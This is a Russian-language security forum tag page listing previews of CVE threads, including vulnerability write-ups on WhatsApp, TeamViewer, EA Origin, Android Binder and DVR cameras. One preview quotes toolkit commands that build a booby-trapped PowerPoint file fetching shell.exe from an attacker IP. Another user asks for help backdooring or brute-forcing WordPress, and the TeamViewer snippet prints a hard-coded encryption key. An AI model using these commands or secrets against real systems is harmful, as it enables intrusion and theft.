cve

  1. Zer0must2b

    Гостевая статья Обнаружение критической уязвимости в WhatsApp Desktop Platform которая позволяет чтение из Local File System

    Это история о том, как я нашел и помог Facebook исправить многочисленные уязвимости в WhatsApp , от простого Open-Redirect через Persistent-XSS и CSP-обхода до полной кроссплатформенности. Чтение из Local File System на Windows и Mac! Еще в 2017 году, путешествуя по Перу, я обнаружил...
  2. Zer0must2b

    Гостевая статья TeamViewer хранит пароли пользователей в реестре, зашифрованные hard-coded ключом

    Даже не знаю с чего начать. Это была безумная поездка, в которой я много чего узнал. TL; DR: TeamViewer хранит пароли пользователей, зашифрованные с помощью AES-128-CBC, с ключами 0602000000a400005253413100040000 & IV of 0100010067244F436E6762F25EA8D704 в реестре Windows. Если пароль...
  3. CYBRED

    Гостевая статья Сомнительное путешествие от XSS к RCE

    Как многие читающие, наверняка, знают, в середине апреля 2019 года была обнаружена уязвимость удаленного выполнения кода в клиенте EA Origin (CVE-2019-11354). О ней и некоторых других багах, @zer0pwn с другом @Daley решили рассказать на страницах своего блога. Отладка Origin Многие...
  4. g00db0y

    Статья Анализ CVE-2019-2215(/dev/binder UAF)

    За последние несколько недель, я пытался понять недавний Android Binder Use-After-Free (UAF), опубликованный Проектом Google Project Zero (p0). Этот баг на самом деле не новый, проблема была обнаружена и исправлена в основном ядре в феврале 2018 года, однако, p0 обнаружил, что многие популярные...
  5. Pulsera

    Решено Как происходит присваивание CVE

    Всем привет. У меня такой вопрос, как происходит присваивание CVE к уязвимости? Допустим человек нашел уязвимость, сообщил о ней разработчикам, они ее исправляют и дальше что? мне интересно как они присваивают CVE номер и как это становится известно, что информация о уязвимости появляется на...
  6. 9

    Проблема Wordpress 3.2.1 exploit

    Hi guys! Sorry for my eng, you may chat in russian, I will understand. Have a problem: already know wordpress version, users and a few vulnerabilities/CVE numbers So... Smb know how and which of them can help to brute passwd or maybe load backdoor/shell?
  7. Литиум

    Soft Apache Struts v3 - Используем уязвимости.

    Всем привет. Представляю вам новинку. Она проверяет 3 уязвимости. Страница разработчика -== s1kr10s/Apache-Struts-v3 Разработчик -== s1kr10s Введение. Apache Struts v3 - Скрипт , который содержит набор из 3 уязвимостей: 1)CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'...
  8. Dr.Lafa

    Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

    Приветствую, форумчане. Не так давно была обнаружена уязвимость, затрагивающая довольно большое количество камер. Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе...
  9. Tayrus

    Помогите с CVE

    Нашел мануал по вшиванию payload в презентацию. Вот строки python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe Хотел спросить вот что, чтобы оно скачивало надо порт открыть или не?